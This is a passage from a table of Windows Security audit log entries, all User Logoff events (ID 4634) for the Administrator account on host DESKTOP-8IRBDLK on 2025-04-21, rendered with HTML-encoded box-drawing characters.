#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:19 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 709       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2af305'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:21 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 713       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2af6ec'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:23 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 717       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2aabfc'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:24 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 718       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x299a6f'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:24 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 719       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2afaed'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:35 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 729       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2c33a1'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:37 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 733       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2c8f20'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:40 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 737       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2bbadd'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:40 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 738       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2afd1f'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:40 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 739       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2ca1bd'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:52 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 749       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
